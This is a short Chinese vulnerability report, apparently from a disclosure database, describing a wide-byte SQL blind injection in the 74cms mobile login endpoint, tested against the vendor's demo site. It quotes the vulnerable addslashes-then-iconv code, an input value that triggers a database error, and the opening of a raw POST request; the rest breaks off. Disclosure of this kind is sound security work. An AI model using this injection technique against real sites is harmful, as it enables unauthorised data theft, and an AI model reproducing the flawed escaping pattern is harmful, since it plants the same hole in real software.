骑士CMS某接口1处宽字节SQL盲注之三(官网demo测试)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 骑士CMS某接口1处宽字节SQL盲注(官网demo测试) ### 详细说明: 手机客户端1处接口存在宽字节SQL注入,无关键字过滤,理论上可以获取任意数据。 ``` http://demo.74cms.com/android/login.php ``` 对应代码: ``` 10 $username=addslashes($username); 11 $password=addslashes($password); 12 $username=iconv("utf-8",QISHI_DBCHARSET,$username); 13 $password=iconv("utf-8",QISHI_DBCHARSET,$password); ``` $username经过iconv转换后直接进入了SQL,导致SQL注入。没有回显,只好时间延迟注入了。 0x01: "username": "%E9%8C%A6"返回数据库错误 ``` POST http://demo.74cms.com/android/login.php HTTP/1.1 Host: demo.74cms.com User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: null Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 73 Cookie: safedog-flow-item=7308413BC1624F4F2DF983295AAE94E8; PHPSESSID=735536f52f85396245830255c85834c4 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息